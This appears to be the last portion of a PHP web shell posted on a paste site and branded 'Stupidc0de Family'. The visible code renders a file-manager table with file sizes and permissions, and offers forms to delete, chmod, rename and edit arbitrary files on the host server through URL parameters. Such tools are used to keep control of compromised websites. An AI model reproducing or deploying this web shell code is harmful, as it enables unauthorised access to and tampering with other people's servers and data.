  687.             <input type=\"hidden\" name=\"name\" value=\"$dir\">
  688.             <input type=\"hidden\" name=\"path\" value=\"$path/$dir\">
  689.             <input class='bordergaya' type=\"submit\" value=\"Execute\" />
  690.             </form></center></td>
  691.             </tr>"; } echo '<tr class="first"><td></td><td></td><td></td><td></td></tr>'; foreach($scandir as $file){ if(!is_file("$path/$file")) continue; $size = filesize("$path/$file")/1024; $size = round($size,3); if($size >= 1024){ $size = round($size/1024,2).' MB'; }else{ $size = $size.' KB'; } echo "<tr>
  692.             <td><a style='color:white; font-family:Homenaje;' href=\"?filesrc=$path/$file&path=$path\">$file</a></td>
  693.             <td><center  style='color:orange; font-family:Homenaje;'>".$size."</center></td>
  694.             <td><center>"; if(is_writable("$path/$file")) echo "<font style='color:springgreen; font-family:Homenaje;'>"; elseif(!is_readable("$path/$file")) echo "<font style='color:red; font-family:Homenaje;'>"; echo perms("$path/$file"); if(is_writable("$path/$file") || !is_readable("$path/$file")) echo '</font>'; echo "</center></td>
  695.             <td width='26%'><center><form method=\"POST\" action=\"?option&path=$path\">
  696.             <select class='bordergaya' name=\"opt\">
  697.             <option value=\"\"></option>
  698.             <option value=\"delete\">Delete</option>
  699.             <option value=\"chmod\">Chmod</option>
  700.             <option value=\"rename\">Rename</option>
  701.             <option value=\"edit\">Edit</option>
  702.             </select>
  703.             <input type=\"hidden\" name=\"type\" value=\"file\">
  704.             <input type=\"hidden\" name=\"name\" value=\"$file\">
  705.             <input type=\"hidden\" name=\"path\" value=\"$path/$file\">
  706.             <input class='bordergaya' type=\"submit\" value=\"Execute\" />
  707.             </form></center></td>
  708.             </tr>"; } echo '</table>
  709.             </div>'; } ?>
  710. <br/><br/>
  711. <script language="JavaScript"> Year=new Date(); var copyright=Year.getUTCFullYear(); document.write("<font face='Fredericka the Great' size='3px' color='grey'>&copy; Stupidc0de Family  " + copyright +"</font> "); </script>
  712.  
  713. </BODY></html>
Add Comment
Please, Sign In to add comment